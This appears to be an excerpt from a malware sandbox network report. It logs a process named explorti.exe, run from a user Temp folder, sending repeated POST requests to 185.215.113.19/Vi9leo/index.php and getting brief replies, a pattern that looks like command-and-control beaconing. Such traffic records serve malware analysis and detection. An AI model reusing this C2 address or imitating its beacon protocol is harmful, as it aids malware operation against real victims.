                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:08.447170973 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:08 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      5192.168.2.449742185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:08.563178062 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:09.325263977 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:09 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:09.329444885 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:09.574621916 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:09 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      6192.168.2.449743185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:09.687731028 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:10.820327044 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:10 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:10.821593046 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:10 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:10.821752071 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:11.073326111 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:10 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      7192.168.2.449744185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:11.187298059 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:11.996247053 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:11 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:11.998744011 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:12.244764090 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:12 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      8192.168.2.449745185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:12.359446049 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:13.129484892 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:13 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:13.130716085 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:13.382339001 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:13 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      9192.168.2.449746185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:13.505218983 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:14.272064924 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:14 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:14.272983074 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:14.522800922 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:14 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      10192.168.2.449747185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:14.643167973 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:15.398758888 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:15 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:15.399614096 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:15.646560907 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:15 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      11192.168.2.449748185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:15.765801907 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:16.517934084 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:16 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:16.519432068 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:16.768125057 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:16 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      12192.168.2.449749185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:16.876135111 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:17.647362947 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:17 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:17.648288965 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:17.897310972 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:17 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      13192.168.2.449750185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:18.031981945 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:18.803183079 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:18 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:18.805221081 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:19.052527905 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:18 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      14192.168.2.449751185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:19.173304081 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:19.964478016 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:19 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:19.966052055 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:21.093306065 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:20 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0
                      Jul 26, 2024 20:57:21.100799084 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:20 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0
                      Jul 26, 2024 20:57:21.102647066 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:20 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0
                      Jul 26, 2024 20:57:21.106126070 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:20 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      15192.168.2.449752185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:21.206692934 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:21.995510101 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:21 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:21.996994972 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:22.272706985 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:22 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
